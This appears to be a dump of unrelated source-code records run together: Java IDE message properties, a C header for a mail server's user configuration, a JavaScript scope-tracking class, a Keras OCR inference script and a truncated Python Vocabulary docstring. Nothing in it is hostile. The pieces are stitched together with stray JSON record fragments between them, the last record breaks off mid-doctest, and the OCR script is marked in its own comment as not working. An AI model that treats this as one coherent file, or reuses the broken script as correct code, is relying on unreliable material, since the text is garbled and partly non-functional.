Source\ni18n.quickfix.property.panel.title=Property Info\ni18n.quickfix.property.panel.update.all.files.in.bundle.checkbox=Update all properties files in &Resource bundle\ni18n.quickfix.property.panel.properties.file.label=&Properties File:\ni18n.quickfix.property.panel.property.value.label=Property &Value:\ni18n.quickfix.property.panel.property.key.label=Property &Key:\ni18n.quickfix.code.panel.title=Java Code Info\ni18n.quickfix.code.panel.resource.bundle.expression.label=Resource bundle &expression:\ni18n.quickfix.preview.panel.title=Preview\nquickfix.i18n.concatentation=I18nize string concatenation containing hard coded string literal\nquickfix.i18n.concatentation.error=String concatenation not found\nquickfix.i18n.command.name=I18nize\ninspection.i18n.display.name=Hard coded strings\ninspection.i18n.option.ignore.assert=Ignore for assert statement arguments\ninspection.i18n.option.ignore.for.exception.constructor.arguments=Ignore for exception constructor arguments:\ninspection.i18n.option.ignore.for.specified.exception.constructor.arguments=Ignore for specified exception constructor arguments\ninspection.i18n.option.ignore.for.junit.assert.arguments=Ignore for JUnit assert arguments\ninspection.i18n.option.ignore.qualified.class.names=Ignore literals which have value equal to existing qualified class name\ninspection.i18n.option.ignore.property.keys=Ignore literals which have value equal to existing property key\ninspection.i18n.option.ignore.nonalphanumerics=Ignore literals which do not contain alphabetic characters\ninspection.i18n.quickfix=I18nize hard coded string literal\ninspection.i18n.message.general.with.value=Hard coded string literal: {0}\ninspection.unresolved.property.key.reference.name=Invalid property key\ninspection.unresolved.property.key.reference.message=String literal 
''{0}'' doesn''t appear to be valid property key\ninspection.invalid.resource.bundle.reference=Invalid resource bundle reference ''{0}''\ni18nize.dialog.title=I18nize Hardcoded String\ni18nize.dialog.error.jdk.message=Class 'java.util.ResourceBundle' cannot be found.\\nPlease setup correct JDK.\ni18nize.dialog.error.jdk.title=Class Not Found\ni18nize.dialog.property.file.chooser.title=Choose Properties File\ni18nize.dialog.template.link.label=Edit I18n template\ni18nize.dialog.error.property.already.defined.message=Property ''{0}'' already exists in the file ''{1}''\ni18nize.dialog.error.property.already.defined.title=Property Already Exists\nintention.split.declaration.family=Split Declaration\nintention.split.declaration.text=Split into separate declarations\nintention.split.declaration.assignment.text=Split into declaration and assignment\nintention.add.override.annotation=Add '@Override' Annotation\nintention.add.override.annotation.family=Add Override Annotation\nintention.make.type.generic.family=Make Type Generic\nintention.make.type.generic.text=Change type of {0} to {1}\nintention.split.if.family=Split If\nintention.split.if.text=Split into 2 if's\nintention.introduce.variable.text=Introduce local variable\nintention.encapsulate.field.text=Encapsulate field\nintention.implement.abstract.method.family=Implement Abstract Method\nintention.implement.abstract.method.text=Implement method ''{0}''\nintention.override.method.text=Override method ''{0}''\nintention.add.annotation.family=Add Annotation\nintention.add.on.demand.static.import.family=Add On Demand Static Import\nintention.add.on.demand.static.import.text=Add on demand static import for ''{0}''\nintention.add.single.member.static.import.family=Add Single-Member Static Import\nintention.add.single.member.static.import.text=Add static import for ''{0}''\nintention.replace.concatenation.with.formatted.output.family=Replace Concatenation with Formatted Output\nintention.replace.concatenation.with.formatted.output.text=Replace '+' with 'java.text.MessageFormat.format()'\nintention.color.chooser.dialog=Choose Color\nintention.convert.to.basic.latin=Convert to Basic Latin\nintention.surround.resource.with.ARM.block=Surround with try-with-resources block\ndialog.create.field.from.parameter.title=Create Field\ndialog.create.field.from.parameter.already.exists.text=Use existing field ''{0}''?\ndialog.create.field.from.parameter.already.exists.title=Field Already Exists\ndialog.create.field.from.parameter.field.type.label=Field of type:\ndialog.create.field.from.parameter.field.name.label=Name:\ndialog.create.field.from.parameter.declare.final.checkbox=Declare &final\ndialog.create.class.destination.package.label=Destination package:\ndialog.create.class.package.chooser.title=Choose Destination Package\ncreate.directory.command=Create directory\ndialog.create.class.label=Create {0}:\ndialog.create.class.name=Create {0} {1}\nintention.implement.abstract.class.family=Implement Abstract Class or Interface\nintention.implement.abstract.class.default.text=Implement Abstract Class\nintention.implement.abstract.class.interface.text=Implement Interface\nintention.implement.abstract.class.subclass.text=Create Subclass\nintention.error.cannot.create.class.message=Cannot Create Class ''{0}''\nintention.error.cannot.create.class.title=Failed to Create Class\nintention.assign.field.from.parameter.text=Assign Parameter to Field ''{0}''\nintention.assign.field.from.parameter.family=Assign Parameter to 
Field\nintention.create.field.from.parameter.text=Create Field for Parameter ''{0}''\nintention.create.field.from.parameter.family=Create Field for Parameter\nintention.bind.fields.from.parameters.text=Bind {0} Parameters to Fields\nintention.bind.fields.from.parameters.family=Bind Parameters to Fields\nintention.implement.abstract.method.searching.for.descendants.progress=Searching For Descendants...\nintention.implement.abstract.method.error.no.classes.message=There are no classes found where this method can be implemented\nintention.implement.abstract.method.error.no.classes.title=No Classes Found\nintention.implement.abstract.method.class.chooser.title=Choose Implementing Class\nintention.implement.abstract.method.command.name=Implement method\nintention.invert.if.condition=Invert If Condition\nintention.extract.if.condition.text=Extract if ({0})\nintention.extract.if.condition.family=Extract If Condition\nintention.underscores.in.literals.family=Underscores in numeric literals\nintention.remove.literal.underscores=Remove underscores from literal\nintention.insert.literal.underscores=Insert underscores into literal\nintention.replace.cast.with.var.text=Replace ''{0}'' with ''{1}''\nintention.replace.cast.with.var.family=Replace cast with variable\nintention.convert.color.representation.text=Convert to ''new Color{0}''\nintention.convert.color.representation.family=Convert Color representation\nintention.break.string.on.line.breaks.text=Break string on '\\\\n'\n\n\nintention.create.test=Create Test\nintention.create.test.dialog.testing.library=Testing library:\nintention.create.test.dialog.language=Language:\nintention.create.test.dialog.class.name=Class name:\nintention.create.test.dialog.super.class=Superclass:\nintention.create.test.dialog.choose.super.class=Choose Superclass\nintention.create.test.dialog.generate=Generate:\nintention.create.test.dialog.show.inherited=Show inherited methods\nintention.create.test.dialog.select.methods=Generate test methods for:\nintention.create.test.dialog.library.not.found={0} library not found in the module\nintention.create.test.dialog.fix.library=Fix\nintention.create.test.dialog.java=Java\n\nlightbulb.tooltip=Click or press {0}\ndialog.intention.settings.intention.list.title=Intention List\ndialog.intention.settings.description.panel.title=Description\ndialog.intention.settings.description.usage.example.title=Usage Example\nintention.settings=Intentions\nintention.settings.category.text=\\\n
You have selected the intention category ''{0}''.
\\\n
By clicking the checkbox, you can enable/disable all intentions in this category.
\\\n
To enable/disable a particular intention, select the intention inside this category.
\\\n
\njavadoc.description.copied.from.interface=Description copied from interface:\njavadoc.description.copied.from.class=Description copied from class:\njavadoc.deprecated=Deprecated\njavadoc.since=Since:\njavadoc.see.also=See Also:\njavadoc.parameters=Parameters:\njavadoc.returns=Returns:\njavadoc.throws=Throws:\njavadoc.method.in.interface={0} in interface {1}\njavadoc.method.in.class={0} in class {1}\njavadoc.method.overrides=Overrides:\njavadoc.method.specified.by=Specified by:\njavadoc.external.fetch.error.message=Cannot fetch remote documentation: {0}\nsearching.for.implementations=Searching For Implementations...\n\ngoto.implementation.chooserTitle=Choose Implementation of {0} ({1} found)\ngoto.implementation.findUsages.title=Implementations of {0}\ngoto.implementation.notFound=No implementations found\n\ngoto.test.chooserTitle.test=Choose Test for {0} ({1} found)\ngoto.test.findUsages.test.title=Tests for {0}\ngoto.test.chooserTitle.subject=Choose Test Subject for {0} ({1} found)\ngoto.test.findUsages.subject.title=Test Subjects for {0}\ngoto.test.notFound=No test subjects found\n\nincremental.search.tooltip.prefix=Search for:\ngoto.super.method.chooser.title=Choose super method\ngoto.super.method.findUsages.title=Super methods of {0}\ngoto.super.class.chooser.title=Choose super class or interface\njavadoc.action.back=Back\njavadoc.action.forward=Forward\njavadoc.action.view.external=View External Documentation\njavadoc.documentation.not.found.message=The documentation for this element is not found.\\nPlease add all the needed paths to API docs in Project Settings.\njavadoc.documentation.not.found.title=No Documentation\njavadoc.fetching.progress=Fetching Documentation...\nno.documentation.found=No documentation found.\njavadoc.candiates=Candidates for method call {0} are:

{1}\njavadoc.candidates.not.found=No candidates found for method call {0}.\ndeclaration.navigation.title=Choose Declaration\ntemplate.shortcut.enter=Enter\ntemplate.shortcut.tab=Tab\ntemplate.shortcut.space=Space\ndialog.edit.live.template.title=Edit Live Template\ndialog.add.live.template.title=Add Live Template\ntemplates.no.defined=No templates defined in this context\ntemplates.surround.no.defined=No surround templates defined in this context\ntemplates.no.defined.with.prefix=No templates starting with ''{0}'' defined in this context\ntemplates.settings.page.title=Live Templates\ntemplates.select.template.chooser.title=Select Template\ntemplates.export.display.name=Live templates\ntemplates.dialog.edit.variables.title=Edit Template Variables\ntemplates.dialog.edit.variables.border.title=Variables\ntemplates.dialog.edit.variables.action.move.up=Move &Up\ntemplates.dialog.edit.variables.action.move.down=Move &Down\ntemplates.dialog.edit.variables.table.column.name=Name\ntemplates.dialog.edit.variables.table.column.expression=Expression\ntemplates.dialog.edit.variables.table.column.default.value=Default value\ntemplates.dialog.edit.variables.table.column.skip.if.defined=Skip if defined\ntemplates.dialog.table.column.abbreviation=Abbreviation\ntemplates.dialog.table.column.description=Description\ntemplates.dialog.table.column.active=Active\ntemplates.dialog.shortcut.chooser.label=By default expand with\ndialog.copy.live.template.title=Copy Live Template\ndialog.edit.template.shortcut.default=Default ({0})\ndialog.edit.template.template.text.title=&Template text:\ndialog.edit.template.button.edit.variables=&Edit variables\ndialog.edit.template.label.abbreviation=&Abbreviation:\ndialog.edit.template.label.group=&Group:\ndialog.edit.template.label.description=&Description:\ndialog.edit.template.options.title=Options\ndialog.edit.template.label.expand.with=E&xpand with\ndialog.edit.template.checkbox.reformat.according.to.style=&Reformat according to style\ndialog.edit.template.checkbox.shorten.fq.names=Shorten &FQ names\ndialog.edit.template.checkbox.use.static.import=Use static &import if possible\ndialog.edit.template.context.title=Context\ndialog.edit.template.checkbox.html=&HTML\ndialog.edit.template.checkbox.xml=&XML\ndialog.edit.template.checkbox.jsp=JS&P\ndialog.edit.template.checkbox.smart.type.completion=Smart type c&ompletion\ndialog.edit.template.error.title=Cannot Save\ndialog.edit.template.error.malformed.abbreviation=Cannot save the template.\\nTemplate abbreviation should contain only letters, digits, dots and hyphens.\ndialog.edit.template.error.already.exists=Cannot save the template.\\nTemplate with the abbreviation \\\"{0}\\\"\\nalready exists in group \\\"{1}\\\".\\nPlease choose a different abbreviation or group.\nfinish.template.command=Finish Template\ninsert.code.template.command=Insert Code Template\ntemplate.next.variable.command=Go to Next Code Template Tab\ntemplate.previous.variable.command=Go to Previous Code Template 
Tab\nmacro.array.variable=arrayVariable()\nmacro.capitalize.string=capitalize(String)\nmacro.cast.to.left.side.type=castToLeftSideType()\nmacro.classname=className()\nmacro.component.type.of.array=componentTypeOf(Array)\nmacro.current.package=currentPackage()\nmacro.decapitalize.string=decapitalize(String)\nmacro.firstWord.string=firstWord(String)\nmacro.undescoresToSpaces.string=underscoresToSpaces(String)\nmacro.undescoresToCamelCase.string=underscoresToCamelCase(String)\nmacro.capitalizeAndUnderscore.string=capitalizeAndUnderscore(String)\nmacro.descendant.classes.enum=descendantClassesEnum(String)\nmacro.enum=enum(...)\nmacro.expected.type=expectedType()\nmacro.groovy.script=groovyScript(\"groovy code\")\nmacro.guess.element.type.of.container=guessElementType(Container)\nmacro.iterable.component.type=iterableComponentType(ArrayOrIterable)\nmacro.iterable.variable=iterableVariable()\nmacro.linenumber=lineNumber()\nmacro.methodname=methodName()\nmacro.method.parameters=methodParameters()\nmacro.qualified.class.name=qualifiedClassName()\nmacro.right.side.type=rightSideType()\nmacro.suggest.index.name=suggestIndexName()\nmacro.suggest.variable.name=suggestVariableName()\nmacro.suggest.first.variable.name=suggestFirstVariableName()\nmacro.variable.of.type=variableOfType(Type)\nmacro.file.name=fileName()\nmacro.file.name.without.extension=fileNameWithoutExtension()\ncommand.name.surround.with.runtime.cast=Surround with runtime cast\ninspection.i18n.expression.is.invalid.error.message=The I18nized Expression template is not a valid expression\ninspection.error.dialog.title=Error\nlivetemplate.description.tag.pair=Tag pair\nlivetemplate.description.itar=Iterate elements of array\nlivetemplate.description.itco=Iterate elements of java.util.Collection\nlivetemplate.description.iten=Iterate java.util.Enumeration\nlivetemplate.description.itit=Iterate java.util.Iterator\nlivetemplate.description.itli=Iterate elements of java.util.List\nlivetemplate.description.ittok=Iterate tokens from String\nlivetemplate.description.itve=Iterate elements of java.util.Vector\nlivetemplate.description.ritar=Iterate elements of array in reverse order\nlivetemplate.description.iter=Iterate Iterable | Array in J2SDK 5.0 syntax\nlivetemplate.description.itover=Iterate over an Iterable or Array selection in J2SDK 5.0 syntax\nlivetemplate.description.inst=Checks object type with instanceof and down-casts it\nlivetemplate.description.lst=Fetches last element of an array\nlivetemplate.description.mn=Sets lesser value to a variable\nlivetemplate.description.mx=Sets greater value to a variable\nlivetemplate.description.psvm=main() method declaration\nlivetemplate.description.toar=Stores elements of java.util.Collection into array\nlivetemplate.description.lazy=Performs lazy initialization\nlivetemplate.description.if.not.null=Inserts ''if not null'' statement\nlivetemplate.description.if.null=Inserts ''if null'' statement\nlivetemplate.description.geti=Inserts singleton method getInstance\nlivetemplate.description.serr=Prints a string to System.err\nlivetemplate.description.sout=Prints a string to System.out\nlivetemplate.description.souf=Prints a formatted string to System.out\nlivetemplate.description.soutm=Prints current class and method names to System.out\nlivetemplate.description.soutp=Prints method parameter names and values to System.out\nlivetemplate.description.soutv=Prints a value to System.out\nlivetemplate.description.st=String\nlivetemplate.description.psf=public static 
final\nlivetemplate.description.psfi=public static final int\nlivetemplate.description.psfs=public static final String\nlivetemplate.description.thr=throw new\nlivetemplate.description.surround.braces=Surround with {}\nlivetemplate.description.surround.parens=Surround with ()\nlivetemplate.description.surround.tag=Surround with \nlivetemplate.description.surround.tag.in.htmlorjsp=Surround with in HTML/JSP\nlivetemplate.description.surround.cdata.in.xmlorhtmlorjsp=Surround with CDATA section\nlivetemplate.description.surround.with.callable=Surround with Callable\nlivetemplate.description.surround.with.read.lock=Surround with ReadWriteLock.readLock\nlivetemplate.description.surround.with.write.lock=Surround with ReadWriteLock.writeLock\nquickfix.add.variable.text=Initialize variable ''{0}''\nquickfix.add.variable.family.name=Initialize variable\ninspection.i18n.quickfix.annotate.as=Annotate as @{0}\ninspection.i18n.quickfix.annotate.element.as=Annotate {0} ''{1}'' as @{2}\ndisable.intention.action=Disable ''{0}''\nenable.intention.action=Enable ''{0}''\nunder.construction.string=Under construction.\ninspection.i18n.option.ignore.comment.pattern=Ignore lines containing this comment (pattern in java.util.Pattern format):\ninspection.i18n.option.ignore.comment.title=Non-Nls comment pattern\ninspection.i18n.option.ignore.assigned.to.constants=Ignore literals assigned to constants\ninspection.i18n.option.ignore.tostring=Ignore contents of toString() method\nintention.move.initializer.to.constructor=Move initializer to constructor\nintention.move.initializer.to.set.up=Move initializer to setUp method\nintention.move.field.assignment.to.declaration=Move assignment to field declaration\ni18nize.jsp.error=Please select JSP text to I18nize.\\nMake sure you have not selected any scriptlets, custom tags or other foreign languages elements.\\nAlso, HTML tags inside selection must be balanced.\ni18nize.error.title=Cannot I18nize Selection\ni18nize.error.message=You can only i18nize Java string literal or substring thereof.\\nPlease point the caret inside Java string literal or select part of it.\ndisplay.coverage.prompt=Do you want to display coverage data for ''{0}''?\ncode.coverage=Code Coverage\ncoverage.button.add.package=Add Package\ncoverage.pattern.filter.editor.choose.package.title=Choose Package\nno.coverage=No coverage\ncode.coverage.is.not.supported=Code coverage is supported for jre 5.0 or higher\ntitle.popup.show.coverage=Coverage Suites\nprompt.remove.coverage=Do you want to remove ''{0}'' coverage data?\ntitle.remove.coverage.data=Remove Coverage Data\ncoverage.data.outdated=Coverage data outdated\ncoverage.data.not.found=Coverage data not found\nerror.cannot.resolve.class=Cannot resolve class ''{0}''\nimplementation.view.title=Definition of {0}\njavadoc.info.title=Documentation for {0}\nintention.intercept.ejb.method.or.class.family=Add EJB interceptor\nintention.intercept.ejb.method.or.class.class.text=Add interceptor for EJB class ''{0}''\nintention.intercept.ejb.method.or.class.method.text=Add interceptor for business method ''{0}''\nintention.edit.interceptor.binding.family=Interceptor Bindings\nintention.edit.interceptor.binding.text=Edit Interceptor ''{0}'' bindings\npowered.by=Powered by\npowered.by.plugin=''{0}'' plugin.\nerror.cannot.convert.default.message=Invalid value: ''{0}''\nerror.cannot.resolve.default.message=Cannot resolve symbol ''{0}''\nerror.cannot.resolve.0.1=Cannot resolve {0} ''{1}''\nerror.unknown.enum.value.message=Unknown enum value 
''{0}''\nunknown.encoding.0=Unknown encoding: ''{0}''\ni18nize.cant.create.properties.file.because.its.name.is.associated=Can''t create properties file ''{0}'' because its name is associated with the {1}.\ni18nize.error.creating.properties.file=Error creating properties file\nnode.method.tooltip=Method\nnode.field.tooltip=Field\nnode.annotation.tooltip=Annotation\nnode.anonymous.class.tooltip=Anonymous Class\nnode.enum.tooltip=Enum\nnode.exception.tooltip=Exception\nnode.interface.tooltip=Interface\nnode.junit.test.tooltip=JUnit Test\nnode.runnable.class.tooltip=Runnable Class\nnode.class.tooltip=Class\nnode.excluded.flag.tooltip=Excluded\nnode.abstract.flag.tooltip=Abstract\nnode.final.flag.tooltip=Final\nnode.static.flag.tooltip=Static\nmultiple.implementations.tooltip=Multiple implementations\nstatic.class.initializer={0}class initializer\n\n# suppress inspection \"UnusedProperty\"\nintentions.category.ejb=EJB\nset.language.level=Set language level\nset.language.level.to.0=Set language level to {0}\nremove.annotation=Remove annotation\ndeannotate.intention.action.text=Deannotate\ndeannotate.intention.chooser.title=Choose annotation to delete\njavadoc.type.parameters=Type parameters:\nhighlight.overridden.classes.chooser.title=Choose Classes to Highlight Overridden Methods from\nno.methods.overriding.0.are.found=No methods overriding {0, choice, 0#|1# '{1}'|2#these classes} are found\ncopy.abstract.method.no.existing.implementations.found=No existing implementations found\ncopy.abstract.method.intention.name=Use existing implementation of ''{0}''\ncopy.abstract.method.popup.title=Choose implementation to copy\ncopy.abstract.method.title=Use Abstract Method Implementation\ni18nize.empty.file.path=Please specify properties file path\nchoose.type.popup.title=Choose Type\ncast.expression=Cast expression\ncast.to.0=Cast to ''{0}''\nclass.completion.file.path=Press {0} again to search for all matching project files\nclass.completion.file.path.all.variants=Press {0} to search for matching files of any type\nproperty.has.more.parameters.than.passed=Property ''{0}'' expected {1} {1, choice, 1#parameter|2#parameters}, passed {2}\ncreate.file.family=Create File\nrename.file.reference.family=Rename File Reference\nrename.file.reference.text=Rename File Reference to {0}\ncreate.directory.text=Create Directory {0}\ncreate.file.text=Create File {0}\ncreate.tagfile.text=Create Tag File {0}\nrename.file.fix=Rename File\nrename.element.family=Rename Element\nrename.public.class.text=Rename class ''{0}'' to ''{1}''\nrename.named.element.text=Rename ''{0}'' to ''{1}''\ndialog.edit.template.checkbox.html.text=HTML Text\ndialog.edit.template.checkbox.xsl.text=XSL Text\n\njavadoc.error.resolving.url=Couldn''t resolve URL {0}

Configuring paths to API docs in project settings might help\n\nblock.comment.intersects.existing.comment=Selected region intersects existing comment\nblock.comment.wrapping.suffix=Selected region contains block comment suffix\nblock.comment.nested.comment=Selected region contained block {0, choice, 1#comment|2#comments},\\nsurrounding ranges were commented.\n\npopup.title.next.error.action.0.goes.through=''Next Error'' Action{0} Goes Through\n\nparameter.info.switch.overload.shortcuts=Switch with {0} or {1}\nparameter.info.switch.overload.shortcuts.single=Switch with {0}\n\nparameter.info.progress.title=Calculating parameter info...\nparameter.info.indexing.mode.not.supported=Parameter Info is unavailable during indexing\n"} {"text": "\n/**\n * @file /magma/objects/config/config.h\n *\n * @brief\tThe user configuration interface.\n */\n\n#ifndef MAGMA_OBJECTS_CONFIG_H\n#define MAGMA_OBJECTS_CONFIG_H\n\ntypedef struct __attribute__ ((packed)) {\n\tuint64_t flags;\n\tstringer_t *key, *value;\n} user_config_entry_t;\n\n// Possible flag values for user config entries.\nenum {\n\tUSER_CONF_STATUS_NONE = 0,\n\tUSER_CONF_STATUS_CRITICAL = 1\n};\n\ntypedef struct __attribute__ ((packed)) {\n\tinx_t *entries;\n\tuint64_t usernum, serial;\n} user_config_t;\n\n/// config.c\nuser_config_t * user_config_alloc(uint64_t usernum);\nuser_config_t * user_config_create(uint64_t usernum);\nint_t user_config_edit(user_config_t *collection, stringer_t *key, stringer_t *value);\nuser_config_entry_t * user_config_entry_alloc(stringer_t *key, stringer_t *value, uint64_t flags);\nvoid user_config_entry_free(user_config_entry_t *entry);\nvoid user_config_free(user_config_t *collection);\nint_t user_config_update(user_config_t *collection);\n\n/// datatier.c\nint_t user_config_delete(uint64_t usernum, stringer_t *key);\nbool_t user_config_fetch(user_config_t *collection);\nint_t user_config_upsert(uint64_t usernum, stringer_t *key, stringer_t *value, uint64_t flags);\n\n#endif\n\n"} {"text": "\n\n"} {"text": "\n"} {"text": "/* @flow */\n\nimport type Node from '../../elements/Node';\nimport Reference from './Reference';\nimport Variable from './Variable';\nimport {default as Definition, types, typeOrder} from './Definition';\nimport toArray from '../../utils/toArray';\n\nexport default class Scope {\n constructor(scopeInfo: ScopeInfo) {\n let {node, parentScope, isProgramScope, isFunctionScope, isClassScope, isArrowFunctionScope} = scopeInfo;\n\n this.node = node;\n this.parentScope = parentScope;\n if (parentScope) {\n parentScope.childScopes.push(this);\n this._depth = parentScope._depth + 1;\n } else {\n this._depth = 0;\n }\n this.childScopes = [];\n this._variables = new Map();\n this._references = new Map();\n this._isProgramScope = Boolean(isProgramScope);\n this._isFunctionScope = Boolean(isFunctionScope);\n this._isClassScope = Boolean(isClassScope);\n this._isArrowFunctionScope = Boolean(isArrowFunctionScope);\n\n if (isProgramScope) {\n this._programReferences = new Map();\n this._programDefinitions = new Map();\n }\n }\n\n _isProgramScope: boolean;\n _isFunctionScope: boolean;\n _isClassScope: boolean;\n _isArrowFunctionScope: boolean;\n node: Node;\n _depth: number;\n parentScope: ?Scope;\n childScopes: Scope[];\n _variables: Map;\n _references: Map;\n\n _programReferences: Map;\n _programDefinitions: Map;\n\n _addVariable(variable: Variable) {\n let variables = this._variables.get(variable.name);\n if (variables) {\n variables.push(variable);\n variables.sort((variable1: Variable, variable2: Variable) 
=> {\n let typeOrder1 = typeOrder[variable1.type];\n let typeOrder2 = typeOrder[variable2.type];\n if (typeOrder1 > typeOrder2) {\n return 1;\n }\n if (typeOrder1 < typeOrder2) {\n return -1;\n }\n return 0;\n });\n } else {\n this._variables.set(variable.name, [variable]);\n }\n }\n\n _addDefinition(definitionInfo: DefinitionInfo) {\n let {node, name, type} = definitionInfo;\n if (type === types.Variable) {\n if (!this._isFunctionScope && this.parentScope) {\n this.parentScope._addDefinition(definitionInfo);\n return;\n }\n }\n\n let variables = this._variables.get(name) || [];\n let variable: ?Variable;\n for (let item of variables) {\n if (item.type === type) {\n variable = item;\n break;\n }\n }\n\n if (!variable) {\n variable = new Variable({name, type, scope: this});\n this._adjustReferencesOnVariableAdd(variable);\n this._addVariable(variable);\n }\n\n let definition = new Definition({node, type, scope: this});\n\n variable._addDefinition(definition);\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programDefinitions.set(node, definition);\n }\n }\n\n _removeDefinition(definition: Definition) {\n let variable = definition.variable;\n\n variable._removeDefinition(definition);\n\n if (\n variable._definitions.size === 0 &&\n (\n variable.type === 'LetVariable' ||\n variable.type === 'Constant' ||\n variable.type === 'Variable' ||\n variable.type === 'Parameter' ||\n variable.type === 'SelfReference' ||\n variable.type === 'CatchClauseError' ||\n variable.type === 'ImportBinding'\n )\n ) {\n removeVariable(variable);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programDefinitions.delete(definition.node);\n }\n }\n\n _adjustReferencesOnVariableAdd(variable: Variable) {\n let depth = variable.scope._depth;\n let references = this._references.get(variable.name);\n if (references) {\n for (let reference of references) {\n let refVar = reference.variable;\n let varDepth = refVar.scope._depth;\n if (varDepth === depth) {\n if (typeOrder[variable.type] < typeOrder[refVar.type]) {\n refVar._transferReferences(variable);\n removeVariableIfRequired(refVar);\n }\n } else if (varDepth < depth) {\n refVar._references.delete(reference);\n variable._addReference(reference);\n reference.variable = variable;\n removeVariableIfRequired(refVar);\n }\n }\n }\n\n for (let childScope of this.childScopes) {\n childScope._adjustReferencesOnVariableAdd(variable);\n }\n }\n\n _addReference(referenceInfo: ReferenceInfo) {\n let {name} = referenceInfo;\n let reference = new Reference({scope: this, ...referenceInfo});\n this._assignReference(reference, name);\n let references = this._references.get(name);\n if (references) {\n references.push(reference);\n } else {\n this._references.set(name, [reference]);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programReferences.set(reference.node, reference);\n }\n }\n\n _assignReference(reference: Reference, name: string) {\n let currentScope = this;\n do {\n let variables = currentScope._variables.get(name);\n if (variables) {\n if (reference.type) {\n for (let variable of variables) {\n if (variable.type === reference.type) {\n variable._addReference(reference);\n return;\n }\n }\n } else {\n variables[0]._addReference(reference);\n return;\n }\n }\n if (!currentScope.parentScope) {\n let globalVariable = new Variable({\n name, type: types.ImplicitGlobal, scope: currentScope,\n });\n globalVariable._addReference(reference);\n 
currentScope._addVariable(globalVariable);\n return;\n } else {\n if (\n (\n (name === 'arguments' || name === 'this') &&\n currentScope._isFunctionScope &&\n !currentScope._isArrowFunctionScope &&\n !currentScope._isProgramScope\n ) ||\n (\n name === 'super' && currentScope._isClassScope\n )\n ) {\n let builtInVariable = new Variable({\n name, type: types.BuiltIn, scope: currentScope,\n });\n builtInVariable._addReference(reference);\n currentScope._addVariable(builtInVariable);\n return;\n }\n currentScope = currentScope.parentScope;\n }\n } while (true);\n }\n\n _removeReference(reference: Reference) {\n let variable = reference.variable;\n let name = variable.name;\n let references = this._references.get(name);\n if (references) {\n let index = references.indexOf(reference);\n if (index !== -1) {\n references.splice(index, 1);\n }\n }\n variable._removeReference(reference);\n if (\n variable._references.size === 0 &&\n (\n variable.type === 'ImplicitGlobal' ||\n variable.type === 'BuiltIn'\n )\n ) {\n removeVariable(variable);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programReferences.delete(reference.node);\n }\n }\n\n _getProgramScope(): ?Scope {\n let scope = this;\n while (scope && !scope._isProgramScope) {\n scope = scope.parentScope;\n }\n return scope;\n }\n\n getVariables(): Variable[] {\n return [].concat(...toArray(this._variables.values()));\n }\n\n getReferences(): Reference[] {\n return [].concat(...toArray(this._references.values()));\n }\n\n destroy() {\n let parentScope = this.parentScope;\n if (parentScope) {\n let scopeIndex = parentScope.childScopes.indexOf(this);\n if (scopeIndex !== -1) {\n parentScope.childScopes.splice(scopeIndex, 1);\n }\n }\n this.getReferences().forEach(this._removeReference, this);\n }\n}\n\nfunction removeVariableIfRequired(variable: Variable) {\n if (variable._references.size === 0 && variable._definitions.size === 0) {\n let variables = variable.scope._variables.get(variable.name);\n if (variables) {\n let index = variables.indexOf(variable);\n\n if (index !== -1) {\n variables.splice(index, 1);\n }\n\n if (variables.length === 0) {\n variable.scope._variables.delete(variable.name);\n }\n }\n }\n}\n\nfunction removeVariable(variable: Variable) {\n let scope = variable.scope;\n let variables = scope._variables.get(variable.name);\n\n if (variables) {\n let index = variables.indexOf(variable);\n if (index !== -1) {\n variables.splice(index, 1);\n if (variables.length === 0) {\n scope._variables.delete(variable.name);\n }\n for (let reference of variable._references) {\n reference.scope._assignReference(reference, variable.name);\n }\n }\n }\n}\n\nexport type ReferenceInfo = {\n node: Node,\n name: string,\n read: boolean,\n write: boolean,\n type?: string\n};\n\nexport type DefinitionInfo = {\n node: Node,\n name: string,\n type: string\n};\n\nexport type ScopeInfo = {\n node: Node,\n parentScope: ?Scope,\n isProgramScope?: boolean,\n isFunctionScope?: boolean,\n isClassScope?: boolean,\n isArrowFunctionScope?: boolean\n};\n"} {"text": "#!/usr/bin/env python\n\nimport os\n\nimport keras\nimport numpy\nimport scipy.ndimage\nfrom image_ocr import TextImageGenerator, create_model, ctc_lambda_func\nfrom keras import backend as K\nfrom keras.layers import Lambda\nfrom keras.models import load_model\nfrom keras.utils.data_utils import get_file\n\nimg_h = 64\nimg_w = 512\npool_size = 2\nwords_per_epoch = 16000\nval_split = 0.2\nval_words = int(words_per_epoch * (val_split))\nif K.image_data_format() 
== 'channels_first':\n input_shape = (1, img_w, img_h)\nelse:\n input_shape = (img_w, img_h, 1)\n\nfdir = os.path.dirname(get_file('wordlists.tgz',\n origin='http://www.mythic-ai.com/datasets/wordlists.tgz', untar=True))\n\nimg_gen = TextImageGenerator(monogram_file=os.path.join(fdir, 'wordlist_mono_clean.txt'),\n bigram_file=os.path.join(fdir, 'wordlist_bi_clean.txt'),\n minibatch_size=32,\n img_w=img_w,\n img_h=img_h,\n downsample_factor=(pool_size ** 2),\n val_split=words_per_epoch - val_words\n )\nprint(f\"Input shape: {input_shape}\")\nmodel, _, _ = create_model(input_shape, img_gen, pool_size, img_w, img_h)\n\nmodel.load_weights(\"my_model.h5\")\n\nx = scipy.ndimage.imread('example.png', mode='L').transpose()\nx = x.reshape(x.shape + (1,))\n\n# Does not work\nprint(model.predict(x, batch_size=1, verbose=0))\n"} {"text": "from .stateful_unit import StatefulUnit\n\n\nclass Vocabulary(StatefulUnit):\n \"\"\"\n Vocabulary class.\n\n :param pad_value: The string value for the padding position.\n :param oov_value: The string value for the out-of-vocabulary terms.\n\n Examples:\n >>> vocab = Vocabulary(pad_value='[PAD]', oov_value='[OOV]')\n >>> vocab.fit(['A', 'B', 'C', 'D', 'E'])\n >>> term_index = vocab.state['term_index']\n >>> term_index # doctest: +SKIP\n {'[PAD]': 0, '[OOV]': 1, 'D': 2, 'A': 3, 'B': 4, 'C': 5, 'E': 6}\n >>> index_term = vocab.state['index_term']\n >>> index_term # doctest: +SKIP\n {0: '[PAD]', 1: '[OOV]', 2: 'D', 3: 'A', 4: 'B', 5: 'C', 6: 'E'}\n\n >>> term_index['out-of-vocabulary-term']\n 1\n >>> index_term[0]\n '[PAD]'\n >>> index_term[42]\n Traceback (most recent call last):\n ...\n KeyError: 42\n >>> a_index = term_index['A']\n >>> c_index = term_index['C']\n >>> 